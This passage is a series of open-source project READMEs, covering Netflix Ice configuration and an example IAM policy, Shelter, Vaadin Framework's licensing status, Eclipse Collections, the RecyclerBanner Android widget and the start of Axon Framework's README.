(describeReservedInstances) for each reservation owner account. ice.owneraccount.account1_name=account2_name,account3_name,account4_name ice.owneraccount.account2_name=account1_name,account3_name,account4_name ice.owneraccount.account5_name=account6_name If different accounts have different AZ mappings, you will also need to subclass BasicAccountService and override method getAccountMappedZone to provide correct AZ mapping. 5. Customized reservation service (*) Reserved instance prices in BasicReservationService are copied from Amazon's ec2 price page as of Jun 1, 2013. Your accounts may have different reservation prices (e.g. Amazon may change prices in the future). In this case, you need to write a subclass of BasicReservationService to provide the correct pricing. 6. Resource service (*) To use the breakdown feature and application group feature, first make sure you signed up the beta version of detailed billing file with resources and tag. Verify you receive monthly billing file in the this format: `<accountid>-aws-billing-detailed-line-items-with-resources-and-tags-<year>-<month>.csv.zip`. Then you will need to subclass abstract class ResourceService and have your own bootstrap.groovy create ProcessorConfig and ReaderConfig. See SampleMapDbResourceService for a sample of subclass. If your custom tags have limited number of value combinations (e.g. < 100), you can choose to set the following parameter in ice.properties, and Ice will generate resource group values for each line item in the billing file. Please be VERY careful about using this feature. Resource group values are generated by concatenating values of of all custom tags. If it results in a long list of resource group values, Ice performance will be greatly affected. Please make sure the custom tags exist in the header of the billing file. # specify your custom tags here. Multiple tags are delimited by ",". If specified, BasicResourceService will be used to generate resource groups for you. # PLEASE MAKE SURE you have limited number (e.g. < 100) of unique value combinations from your custom tags, otherwise Ice performance will be greatly affected. ice.customTags=tag1,tag2 You will need to ensure that any tag you wish to use in ICE is ticked in the "Manage Cost allocation report" page here: https://portal.aws.amazon.com/gp/aws/developer/account?ie=UTF8&action=cost-allocation-report Any tag that you have created yourself (as opposed to being automatically generated by AWS) will require you to use the ice.customTags= parameter in the following way. See this example: ice.customTags=user:CostCenter,User:Environment 7. Weekly cost email per application group (*) If you have resource service enabled, you can use BasicWeeklyCostEmailService to send weekly cost emails. You can use the default BasicS3ApplicationGroupService, or you can have your own ApplicationGroupService implementation. 8. Throughput metric service (*) You may also want to show your organization's throughput metric alongside usage and cost. You can choose to implement interface ThroughputMetricService, or you can simply use the existing BasicThroughputMetricService. Using BasicThroughputMetricService requires the throughput metric data to be stores monthly in files with names like <filePrefix>_2013_04, <filePrefix>_2013_05. Data in files should be delimited by new lines. <filePrefix> is specified when you create BasicThroughputMetricService instance. 9. Blended Costs By default, unblended costs are shown. You can show Blended costs with the following configuration: ice.use_blended=true 10. Extra Grails configuration file If you need to setup custom Grails settings, you can specify an additional configuration file to be loaded by Grails by setting the ``ice.config.location`` system property to the location of that file. See http://docs.grails.org/2.4.4/guide/single.html#configExternalized for more information. ## Example IAM Permissions Grant the following permissions to either an instance role, or the user running the reports: ``` { "Version": "2012-10-17", "Statement": [ { "Sid": "Stmt1421551747000", "Effect": "Allow", "Action": [ "ec2:DescribeReservedInstances", "ec2:DescribeReservedInstancesOfferings" ], "Resource": [ "*" ] }, { "Sid": "Stmt1418665415000", "Effect": "Allow", "Action": [ "s3:DeleteObject", "s3:GetBucketLocation", "s3:GetObject", "s3:ListAllMyBuckets", "s3:ListBucket", "s3:PutObject" ], "Resource": [ "arn:aws:s3:::work-bucket-name/*" ] }, { "Sid": "Stmt1418665415001", "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::work-bucket-name" ] }, { "Sid": "Stmt1418665415000a", "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:GetObject", "s3:ListAllMyBuckets", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::billing-reports-bucket/*" ] }, { "Sid": "Stmt1418665415001a", "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::billing-reports-bucket" ] } ] } ``` ## Support Please use the [Ice Google Group](https://groups.google.com/d/forum/iceusers) for general questions and discussion. ## Download Snapshot Builds Download snapshot builds here: [https://netflixoss.ci.cloudbees.com/job/ice-master/](https://netflixoss.ci.cloudbees.com/job/ice-master/) ## License Copyright 2014 Netflix, Inc. Licensed under the Apache License, Version 2.0 (the “License”); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
SThis repository is a mirror of https://gitea.angry.im/PeterCxy/Shelter
Shelter === Shelter is a Free and Open-Source (FOSS) app that leverages the "Work Profile" feature of Android to provide an isolated space that you can install or clone apps into. Downloads === - [F-Droid](https://f-droid.org/app/net.typeblog.shelter) (Signed by F-Droid) - Custom F-Droid Repository (Signed by PeterCxy, contains latest development versions): - [Click here](fdroidrepos://fdroid.typeblog.net?fingerprint=1A7E446C491C80BC2F83844A26387887990F97F2F379AE7B109679FEAE3DBC8C) to add from your phone - Or scan the following QR-code: ![](fdroid_custom_repo.png) - Or setup manually: - Url: https://fdroid.typeblog.net - Fingerprint: `1A 7E 44 6C 49 1C 80 BC 2F 83 84 4A 26 38 78 87 99 0F 97 F2 F3 79 AE 7B 10 96 79 FE AE 3D BC 8C` You cannot switch between versions listed above that have different signature without uninstalling Shelter first. Features === - Installing apps inside a work profile for isolation - "Freeze" apps inside the work profile to prevent them from running or being woken up when you are not actively using them - Installing two copies of the same app on the same device Discussion & Support === - [Mailing List](https://lists.sr.ht/~petercxy/shelter) - Matrix Chat Room: #shelter:neo.angry.im __The GitHub Issue list and pull requests are not checked regularly. Please use the mailing list instead.__ Caveats & Known Issues === - Some caveats and known issues are discussed during the setup process of Shelter. __Please read through text in the setup wizard carefully__. - Shelter is only as safe as the Work Profile implementation of the Android OS you are using. For details, see <https://support.google.com/work/android/answer/6191949?hl=en> State of the Project, Feature Requests, etc. === Since Shelter simply makes use of the Work Profile APIs exposed by Android, there is a limited set of features that are possible to implement via the app. As we do not intend on leveraging (or "abusing") adb privileges, the features of Shelter can only be a strict subset of the exposed, unprivileged APIs. As a result, we do not intend on adding a lot of new features to Shelter going forward, unless there is to be big changes in the capabilities of work profile APIs. Shelter is currently in an effective **maintenance mode**. Nevertheless, the author is still committed to regularly **adapting Shelter to all new Android versions as soon as possible after they are released** -- this includes upgrading the target SDK level, adapting to any new features or restrictions introduced by the new Android version, updating all dependencies, and so on. The author still relies on Shelter for his daily life, so Shelter will **not** become abandonware in the forseeable future. Contributing === - [Weblate](https://weblate.typeblog.net/projects/shelter/shelter/) for contributing translations - Sponsor me on [Patreon](https://www.patreon.com/PeterCxy) <a href="http://weblate.typeblog.net/engage/shelter/?utm_source=widget"> <img src="http://weblate.typeblog.net/widgets/shelter/-/shelter/multi-auto.svg" alt="Translation status" /> </a> Uninstalling === To uninstall Shelter, please delete the work profile first in Settings -> Accounts, and then uninstall the Shelter app normally.
Vaadin 6, 7, 8 is a Java framework for modern Java web applications.
java vaadin vaadin-framework web-application-framework
[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/vaadin/framework-8?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) # Vaadin Framework *[Vaadin](https://vaadin.com) allows you to build modern web apps efficiently in plain Java, without touching low level web technologies.* This repository serves as an archive of the source code and issue tracking for Vaadin 8 and Vaadin 7. Both use GWT as the base of client-side implementations. Vaadin 8 includes Vaadin 7 compatibility classes. You can find source code and issue tracking for newer, web component based Vaadin versions in [vaadin/platform](https://github.com/vaadin/platform). The code in this repository reflects the state of Vaadin 8.14.3 and Vaadin 7.7.17, the last releases made available under the Apache-2 license, and will be left as-is. ## NOTICE Starting with versions 7.7.30\* and 8.15.0, no new code is being released here, as development now happens in a private repository. However, releases are being published as courtesy notifications to the users who have subscribed to the release feed of this repository. The source code attached to Github releases in this repository reflects the state of code ***in this respository*** at time of release. It is ***NOT*** the source code of the corresponding Extended Maintenance release. \* Note: 7.7.17 is the last Apache-2 licensed version, however in the beginning of the transition phase extended maintenance version changes to the 7.7 branch were being made here. In order to be in compliance with the license terms, you are only allowed to use 7.7 code up to [release 7.7.17](https://github.com/vaadin/framework/releases/tag/7.7.17). ## Vaadin Framework has entered extended maintenance Vaadin Framework 7 and 8 are now being maintained under a closed-source model by the Vaadin Expertise Team. You are free to continue using Vaadin Framework releases up to [8.14.3](https://github.com/vaadin/framework/releases/tag/8.14.3) and [7.7.17](https://github.com/vaadin/framework/releases/tag/7.7.17) as made available through this repository, and you are free to fork and maintain the framework yourself. * Vaadin 8 open source maintenance ended in February 2022, [extended support](https://vaadin.com/vaadin-8-extended-maintenance) is available until February 2032. Starting with version 8.15.0, Vaadin 8 is subject to commercial Vaadin licenses (CVDLv4 from 8.15.0 onward, VCL-1 from 8.19.0 onward, and VCL-2 starting with 8.21.0). The current license is [Vaadin Commercial License, version 2](https://vaadin.com/commercial-license-and-service-terms). * Vaadin 7 open source maintenance ended in Febraury 2019, [extended support](https://vaadin.com/support/vaadin-7-extended-maintenance) is available until February 2029. Starting with version 7.7.18, Vaadin 7 is subject to commercial Vaadin licenses (CVDLv4 from 7.7.18 onward, VCL-1 from 7.7.37 onward, and VCL-2 starting with 7.7.41). The current license is [Vaadin Commercial License, version 2](https://vaadin.com/commercial-license-and-service-terms). Starting with Vaadin 8.21.0 and Vaadin 7.7.41, Vaadin Framework releases will be made available through a *private Maven repository*. To gain access to this private repository, you can find instructions [here](https://vaadin.com/vaadin-8-extended-maintenance-releases). Vaadin Framework releases will eventually be exclusively available through this private repository, but for the time being artifacts will also be released to Maven Central. In order to get access to extended maintenance Framework source code, [contact sales](https://pages.vaadin.com/contact). ## Changelog For a changelog of Vaadin 8 starting with 8.15.0, see the [Vaadin 8 Changelog](CHANGELOG-VAADIN8.md). For a changelog of Vaadin 7 starting with 7.7.30, see the [Vaadin 7 Changelog](CHANGELOG-VAADIN7.md). ## Using Vaadin 8 to develop applications Please refer to [Vaadin tutorial](https://vaadin.com/docs/v8/framework/tutorial.html) and other [documentation](https://vaadin.com/docs/v8/index.html). For known issues within Vaadin framework, see [Issue Tracker](https://github.com/vaadin/framework/issues). Comment or react to an existing issue to mark your interest in resolving it. If you don't find an existing report of an issue you are experiencing, [submit a new issue](https://github.com/vaadin/framework/issues/new/choose). ## Developing Vaadin Framework For instructions on how to set up a working environment for developing the Vaadin framework, please visit [Development Instructions](README-DEV.md). Pay special attention to workspace preferences. ## Contributing As of February 2022, this repository is used for issue tracking. Since we are no longer building releases from this repository, we are no longer accepting pull requests. You may file bug reports here against extended maintenance releases.
Eclipse Collections is a collections framework for Java with optimized data structures and a rich, functional and fluent API.
collections data-structures eclipse-collections functional immutable-collections java java-collections object-oriented primitive-collections
<!-- ~ Copyright (c) 2022 Goldman Sachs and others. ~ All rights reserved. This program and the accompanying materials ~ are made available under the terms of the Eclipse Public License v1.0 ~ and Eclipse Distribution License v. 1.0 which accompany this distribution. ~ The Eclipse Public License is available at https://www.eclipse.org/legal/epl-v10.html ~ and the Eclipse Distribution License is available at ~ https://www.eclipse.org/org/documents/edl-v10.php. --> [![][maven img]][maven] [![][release img]][release] [![][javadoc api img]][javadoc api] [![][javadoc impl img]][javadoc impl] [![][license-epl img]][license-epl] [![][license-edl img]][license-edl] [![][snyk-badge img]][snyk-badge] [![][actions unit-tests img]][actions unit-tests] [![][actions acceptance-tests img]][actions acceptance-tests] [![][actions performance-tests img]][actions performance-tests] [![][actions checkstyle img]][actions checkstyle] [![][actions javadoc img]][actions javadoc] <a href="https://eclipse.dev/collections/"><img src="https://github.com/eclipse/eclipse-collections/blob/master/artwork/eclipse-collections-logo.png" height="50%" width="50%"></a> #### [English](https://eclipse.dev/collections/) | [Deutsch](https://eclipse.dev/collections/de/index.html) | [Ελληνικά](https://eclipse.dev/collections/el/index.html) | [Español](https://eclipse.dev/collections/es/index.html) | [中文](https://eclipse.dev/collections/cn/index.html) | [Français](https://eclipse.dev/collections/fr/index.html) | [日本語](https://eclipse.dev/collections/ja/index.html) | [Norsk (bokmål)](https://eclipse.dev/collections/no-nb/index.html) | [Português-Brasil](https://eclipse.dev/collections/pt-br/index.html) | [Русский](https://eclipse.dev/collections/ru/index.html) | [हिंदी](https://eclipse.dev/collections/hi/index.html) | [Srpski (latinica)](https://eclipse.dev/collections/sr-rs-latn/index.html) Eclipse Collections is a comprehensive collections library for Java. The library enables productivity and performance by delivering an expressive and efficient set of APIs and types. The iteration protocol was inspired by the Smalltalk collection framework, and the collections are compatible with the Java Collection Framework types. Eclipse Collections is compatible with Java 8+. Eclipse Collections is a part of the OpenJDK [Quality Outreach](https://wiki.openjdk.java.net/display/quality/Quality+Outreach) program, and it is validated for different versions of the OpenJDK. ## Why Eclipse Collections? * Productivity * Supports _eager_, _lazy_, _serial_ and _parallel_ iteration patterns * [Rich][RichIterable], functional, and fluent APIs with eager methods available directly on collection types * Provides [`List`][ListIterable], [`Set`][SetIterable], [`Bag`][Bag], [`Stack`][StackIterable], [`Map`][MapIterable], [`Multimap`][Multimap], [`BiMap`][BiMap], [`Interval`][Interval] object container types * [Readable][RichIterable], [`Mutable`][MutableCollection], and [`Immutable`][ImmutableCollection] interfaces for each collection type with covariant return types * [Blog: Rich, Lazy, Mutable, Immutable interfaces in Eclipse collections][BlogRichLazyMutableImmutable] * Mutable and Immutable Collection [Factories][Factories] * [Blog series: As a matter of Factory][BlogAsAMatterOfFactory] * [Adapters][Adapters] and [Utility][Utilities] classes for JCF Types * [Blog: Iterate over any Iterable in Java][BlogIterateOverAnyIterableInJava] * Performance * Memory Efficient Containers * [Blog: UnifiedMap: How it works?][BlogUnifiedMapHowItWorks] * [Blog: UnifiedSet - The Memory Saver][BlogUnifiedSetTheMemorySaver] * Optimized Eager, [`Lazy`][LazyIterable] and [`Parallel`][ParallelIterable] APIs * [Blog: The unparalleled design of Eclipse Collections][BlogUnparalleledDesignOfEclipseCollections] * [Primitive][PrimitiveIterable] Collections for all primitive types * Provides `List`, `Set`, `Bag`, `Stack`, `Map`, `Interval` primitive container types * Maturity * Eclipse Collections has been actively developed and used in financial services applications since 2004 * Eclipse Collections existed for a decade before concise lambda expressions were added in Java 8 * [Blog: My ten-year quest for concise lambda expressions in Java][BlogLambdaExpressionsInJava] ## Learn Eclipse Collections * Blog Series: [Getting Started with Eclipse Collections][BlogGettingStartedWithEclipseCollections] * Blog Series: [The missing Java data structures no one ever told you about][BlogTheMissingJavaDataStructures] * Blog: [Java has Streams. Do we need third-party collections?][BlogJavaHasStreamsDoWeNeedCollections] * [Some Quick Code Examples](./README_EXAMPLES.md) * [Eclipse Collections Katas](https://github.com/eclipse/eclipse-collections-kata), a fun way to help you learn idiomatic Eclipse Collections usage. * Start Here - [Pet Kata](https://eclipse.github.io/eclipse-collections-kata/pet-kata/#/) * Continue Here - [Company Kata](https://eclipse.github.io/eclipse-collections-kata/company-kata/#/) * [Eclipse Collections Reference Guide](https://github.com/eclipse/eclipse-collections/blob/master/docs/0-RefGuide.adoc) and [Javadoc](https://eclipse.dev/collections/javadoc/11.1.0/index.html) * [Serializing Eclipse Collections with Jackson](./docs/jackson.md) * [Articles](https://github.com/eclipse/eclipse-collections/wiki/Articles) and [Blogs](https://medium.com/tag/eclipse-collections/latest) * Some OSS projects that use Eclipse Collections * [Neo4J](https://github.com/neo4j/neo4j), [FINOS Legend](https://github.com/finos/legend-pure), [Reladomo](https://github.com/goldmansachs/reladomo), [Liftwizard](https://github.com/motlin/liftwizard), [Exchange Core](https://github.com/mzheravin/exchange-core), [Dataframe EC](https://github.com/vmzakharov/dataframe-ec), [MapDB](https://github.com/jankotek/mapdb), [Code Browser](https://github.com/yawkat/code-browser), [Obevo](https://github.com/goldmansachs/obevo), [BNY Mellon Code Katas](https://github.com/BNYMellon/CodeKatas), [Eclipse Nebula NatTable](https://www.eclipse.org/nattable/index.php), [Eclipse VIATRA](https://github.com/viatra/org.eclipse.viatra), [Jackson Datatypes Collections](https://github.com/FasterXML/jackson-datatypes-collections) * If you work on an open source project that uses Eclipse Collections, let us know! ## Eclipse Collections and JDK Compatibility Matrix | EC | JDK 5 - 7 | JDK 8 | JDK 9 - 10 | JDK 11 - 14 | JDK 15 - 21 | |--------|-----------|---------|------------|-------------|-------------| | 7.x.x | &check; | &check; | | | | | 8.x.x | | &check; | | | | | 9.x.x | | &check; | &check; | &check; | | | 10.x.x | | &check; | &check; | &check; | | | 10.4.0 | | &check; | &check; | &check; | &check; | | 11.x.x | | &check; | &check; | &check; | &check; | | 12.x.x | | | | &check; | &check; | **Note:** Eclipse Collections 12.x will be compatible with Java 11+. EC 12.0 has not been released as GA yet, but there are a few milestone releases available to test with. ## Acquiring Eclipse Collections ### Maven ```xml <dependency> <groupId>org.eclipse.collections</groupId> <artifactId>eclipse-collections-api</artifactId> <version>11.1.0</version> </dependency> <dependency> <groupId>org.eclipse.collections</groupId> <artifactId>eclipse-collections</artifactId> <version>11.1.0</version> </dependency> ``` ### Gradle ```groovy implementation 'org.eclipse.collections:eclipse-collections-api:11.1.0' implementation 'org.eclipse.collections:eclipse-collections:11.1.0' ``` ### OSGi Bundle Eclipse software repository location: https://download.eclipse.org/collections/11.1.0/repository ## How to Contribute We welcome contributions! We accept contributions via pull requests here in GitHub. Please see [How To Contribute](CONTRIBUTING.md) to get started. ## Additional information * Project Website: https://eclipse.dev/collections * Eclipse PMI: https://projects.eclipse.org/projects/technology.collections * StackOverflow: https://stackoverflow.com/questions/tagged/eclipse-collections * Mailing lists: https://dev.eclipse.org/mailman/listinfo/collections-dev * Forum: https://www.eclipse.org/forums/index.php?t=thread&frm_id=329 * Working with GitHub: https://github.com/eclipse/eclipse-collections/wiki/Working-with-GitHub [actions acceptance-tests]:https://github.com/eclipse/eclipse-collections/actions?query=workflow%3A%22Acceptance+Tests%22 [actions acceptance-tests img]:https://github.com/eclipse/eclipse-collections/workflows/Acceptance%20Tests/badge.svg?branch=master [actions unit-tests]:https://github.com/eclipse/eclipse-collections/actions?query=workflow%3A%22Unit+tests%22 [actions unit-tests img]:https://github.com/eclipse/eclipse-collections/workflows/Unit%20tests/badge.svg?branch=master [actions performance-tests]:https://github.com/eclipse/eclipse-collections/actions?query=workflow%3A%22Performance+Tests%22 [actions performance-tests img]:https://github.com/eclipse/eclipse-collections/workflows/Performance%20Tests/badge.svg?branch=master [actions checkstyle]:https://github.com/eclipse/eclipse-collections/actions?query=workflow%3A%22Checkstyle%22 [actions checkstyle img]:https://github.com/eclipse/eclipse-collections/workflows/Checkstyle/badge.svg?branch=master [actions javadoc]:https://github.com/eclipse/eclipse-collections/actions?query=workflow%3A%22JavaDoc%22 [actions javadoc img]:https://github.com/eclipse/eclipse-collections/workflows/JavaDoc/badge.svg?branch=master [maven]:https://search.maven.org/#search|gav|1|g:"org.eclipse.collections"%20AND%20a:"eclipse-collections" [maven img]:https://maven-badges.herokuapp.com/maven-central/org.eclipse.collections/eclipse-collections/badge.svg [release]:https://github.com/eclipse/eclipse-collections/releases [release img]:https://img.shields.io/github/release/eclipse/eclipse-collections.svg [javadoc api]:https://javadoc.io/doc/org.eclipse.collections/eclipse-collections-api [javadoc api img]:https://javadoc.io/badge2/org.eclipse.collections/eclipse-collections-api/javadoc_eclipse_collections_api.svg [javadoc impl]:https://javadoc.io/doc/org.eclipse.collections/eclipse-collections [javadoc impl img]:https://javadoc.io/badge2/org.eclipse.collections/eclipse-collections/javadoc_eclipse_collections.svg [license-epl]:LICENSE-EPL-1.0.txt [license-epl img]:https://img.shields.io/badge/License-EPL-blue.svg [license-edl]:LICENSE-EDL-1.0.txt [license-edl img]:https://img.shields.io/badge/License-EDL-blue.svg [snyk-badge]:https://snyk.io/vuln/maven:org.eclipse.collections:eclipse-collections@11.1.0?utm_medium=referral&utm_source=badge&utm_campaign=snyk-widget [snyk-badge img]:https://snyk-widget.herokuapp.com/badge/mvn/org.eclipse.collections/eclipse-collections/11.1.0/badge.svg [RichIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/RichIterable.html [ListIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/list/ListIterable.html [SetIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/set/SetIterable.html [Bag]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/bag/Bag.html [StackIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/stack/StackIterable.html [MapIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/map/MapIterable.html [Multimap]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/multimap/Multimap.html [BiMap]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/bimap/BiMap.html [Interval]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/impl/list/Interval.html [MutableCollection]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/collection/MutableCollection.html [ImmutableCollection]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/collection/ImmutableCollection.html [LazyIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/LazyIterable.html [ParallelIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/ParallelIterable.html [PrimitiveIterable]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/api/PrimitiveIterable.html [Utilities]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/impl/utility/package-summary.html [Adapters]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/impl/collection/mutable/AbstractCollectionAdapter.html [BlogRichLazyMutableImmutable]: https://betterprogramming.pub/rich-lazy-mutable-and-immutable-interfaces-in-eclipse-collections-ce64a31b5936?source=friends_link&sk=8056191cec086d565643c8c7b9bd3c1c [BlogLambdaExpressionsInJava]: https://betterprogramming.pub/my-ten-year-quest-for-concise-lambda-expressions-in-java-39fde576b950?source=friends_link&sk=843d797af3f58f893ebdee5e13ce0115 [BlogGettingStartedWithEclipseCollections]: https://donraab.medium.com/blog-series-getting-started-with-eclipse-collections-5634dc39b9e6?source=friends_link&sk=92d8eba8a56167fa840cf9c9ada07326 [BlogTheMissingJavaDataStructures]: https://medium.com/javarevisited/blog-series-the-missing-java-data-structures-no-one-ever-told-you-about-17f34cc4b7e2?source=friends_link&sk=9403ae8464ae3477bfc1e52119c1576d [BlogUnifiedMapHowItWorks]: https://medium.com/oracledevs/unifiedmap-how-it-works-48af0b80cb37 [BlogUnifiedSetTheMemorySaver]: https://medium.com/oracledevs/unifiedset-the-memory-saver-25b830745959 [BlogUnparalleledDesignOfEclipseCollections]: https://medium.com/javarevisited/the-unparalleled-design-of-eclipse-collections-e4340b00f79f?source=friends_link&sk=629e6384171b18233a167a499b46408c [BlogIterateOverAnyIterableInJava]: https://medium.com/javarevisited/iterate-over-any-iterable-in-java-bec78eeeb452?source=friends_link&sk=7d460d1494cb76ce6bc9a5543785224a [BlogAsAMatterOfFactory]: https://medium.com/oracledevs/as-a-matter-of-factory-factories-matter-482d8adff094?source=friends_link&sk=96a4cd8fbc42e309c39a917449e6bff2 [BlogJavaHasStreamsDoWeNeedCollections]: https://motlin.medium.com/java-has-streams-do-we-need-third-party-collections-dd12f473d105 [Factories]: https://eclipse.dev/collections/javadoc/11.1.0/org/eclipse/collections/impl/factory/package-summary.html [10-0-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/10.0.0 [10-1-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/10.1.0 [10-2-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/10.2.0 [10-3-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/10.3.0 [10-4-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/10.4.0 [11-0-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/11.0.0 [11-1-Release]: https://github.com/eclipse/eclipse-collections/releases/tag/11.1.0
banner recyclerview
# RecyclerBanner ## 介绍 RecyclerBanner是一个利用RecycleView实现轮播图的自定义控件。 这里有[相关博客介绍!](https://juejin.im/post/5a13a28c51882512a860ee6a)。 ## 属性 | **属性名称**  | **方法** | **意义** | **类型** | **默认值** | | --- | ---| --- | --- | --- | | app:showIndicator |setShowIndicator(boolean showIndicator)| 是否显示指示器 | boolean | true | | app:interval |setAutoPlayDuration(int autoPlayDuration)| 轮播时间间隔 | int | 4000 | | app:isAutoPlaying |setAutoPlaying(boolean isAutoPlaying)| 是否开启自动轮播 | boolean | true | | app:orientation | setOrientation(int orientation)|轮播图方向 | enum | horizontal | | app:itemSpace |setItemSpace(int itemSpace) |图片间距 | int | 20 | | app:centerScale | setCenterScale(float centerScale)|当前图片缩放比列 | float | 1.2 | | app:moveSpeed | setMoveSpeed(float moveSpeed)|滚动速度,越大越快 | float | 1.0 | 效果如下图: ![](./pictures/banner.gif) ## 使用方法 设置一个带数据的`RecyclerView.Adapter`即可。 ``` <com.example.library.banner.BannerLayout android:id="@+id/recycler" android:layout_width="match_parent" android:layout_height="200dp" app:autoPlaying="true" app:centerScale="1.3" app:itemSpace="20" app:moveSpeed="1.8"/> ``` ``` BannerLayout recyclerBanner = findViewById(R.id.recycler); bannerVertical = findViewById(R.id.recycler_ver); List<String> list = new ArrayList<>(); list.add("http://img0.imgtn.bdimg.com/it/u=1352823040,1166166164&fm=27&gp=0.jpg"); list.add("http://img3.imgtn.bdimg.com/it/u=2293177440,3125900197&fm=27&gp=0.jpg"); list.add("http://img3.imgtn.bdimg.com/it/u=3967183915,4078698000&fm=27&gp=0.jpg"); list.add("http://img0.imgtn.bdimg.com/it/u=3184221534,2238244948&fm=27&gp=0.jpg"); list.add("http://img4.imgtn.bdimg.com/it/u=1794621527,1964098559&fm=27&gp=0.jpg"); list.add("http://img4.imgtn.bdimg.com/it/u=1243617734,335916716&fm=27&gp=0.jpg"); WebBannerAdapter webBannerAdapter=new WebBannerAdapter(this,list); webBannerAdapter.setOnBannerItemClickListener(new BannerLayout.OnBannerItemClickListener() { @Override public void onItemClick(int position) { Toast.makeText(MainActivity.this, "点击了第 " + position+" 项", Toast.LENGTH_SHORT).show(); } }); recyclerBanner.setAdapter(webBannerAdapter); ``` ## License Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ## 致谢 [ViewPagerLayoutManager](https://github.com/leochuan/ViewPagerLayoutManager) 使用了部分代码
Framework for Evolutionary Message-Driven Microservices on the JVM
cqrs domain-driven-design event-sourcing java message-driven performance scalability
# Axon Framework [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.axonframework/axon/badge.svg)](https://maven-badges.herokuapp.com/maven-central/org.axonframework/axon) ![Build Status](https://github.com/AxonFramework/AxonFramework/workflows/Axon%20Framework/badge.svg?branch=master) [![SonarCloud Status](https://sonarcloud.io/api/project_badges/measure?project=AxonFramework_AxonFramework&metric=alert_status)](https://sonarcloud.io/dashboard?id=AxonFramework_AxonFramework) [Axon Framework](https://developer.axoniq.io/axon-framework/overview) is a framework for building evolutionary, event-driven microservice systems based on the principles of Domain-Driven Design (DDD), Command-Query Responsibility Separation (CQRS), and Event Sourcing. Axon Framework provides you with the necessary building blocks to follow these principles. Examples of building blocks are aggregate design handles, aggregate repositories, command buses, saga design handles, event stores, query buses, and more. The framework provides sensible defaults for all of these components out of the box. The messaging support for commands, events, and queries is at the core of these building blocks. It is the messaging basics that enable an evolutionary approach towards microservices through the [location transparency](https://en.wikipedia.org/wiki/Location_transparency) they provide. Axon will also assist in distributing applications to support scalability or fault tolerance, for example. The most accessible and quick road forward would be to use [Axon Server](https://developer.axoniq.io/axon-server/overview) to seamlessly adjust message buses to distributed implementations. Axon Server provides a distributed command bus, event bus, query bus, and an efficient event store implementation for scalable event sourcing. Additionally, the [Axon Framework organization](https://github.com/AxonFramework) has several extensions that can help in this space. All this helps to create a well-structured application without worrying about the infrastructure. Hence, your focus can shift from non-functional requirements to your business functionality. For more information on anything Axon, please visit our website, [http://axoniq.io](http://axoniq.io). ## Getting started Numerous resources can help you on your journey in using Axon Framework. A good starting point is [AxonIQ Developer Portal](https://developer.axoniq.io/), which provides links to resources like blogs, videos, and descriptions. Furthermore, below are several other helpful resources: * The [quickstart page](https://docs.axoniq.io/reference-guide/getting-started/quick-start) of the documentation provides a simplified entry point into the framework with the [quickstart project](https://download.axoniq.io/quickstart/AxonQuickStart.zip). * We have our very own [academy](https://academy.axoniq.io/)! The introductory courses are free, followed by more in-depth (paid) courses. * When ready, you can quickly and easily start your very own Axon Framework based application at https://start.axoniq.io/. Note that this solution is only feasible if you want to stick to the Spring ecosphere. * The [reference guide](https://docs.axoniq.io) explains all of the components maintained within Axon Framework's products. * If the guide doesn't help, our [forum](https://discuss.axoniq.io/) provides a place to ask questions you have during development. * The [hotel demo](https://github.com/AxonIQ/hotel-demo) shows a fleshed-out example of using Axon Framework. * The [code samples repository](https://github.com/AxonIQ/code-samples) contains more in-depth samples you can benefit from. ## Receiving help Are you having trouble using any of our libraries or products? Know that we want to help you out the best we can! There are a couple of things to consider when you're traversing anything Axon: * Checking the [reference guide](https://docs.axoniq.io) should be your first stop. * When the reference guide does not cover your predicament, we would greatly appreciate it if you could file an [issue](https://github.com/AxonIQ/reference-guide/issues) for it. * Our [forum](https://discuss.axoniq.io/) provides a space to communicate with the Axon community to help you out. AxonIQ developers will help you out on a best-effort basis. And if you know how to help someone else, we greatly appreciate your contributions! * We also monitor Stack Overflow for any question tagged with [**axon**](https://stackoverflow.com/questions/tagged/axon). Similarly to the forum, AxonIQ developers help out on a best-effort basis. ## Feature requests and 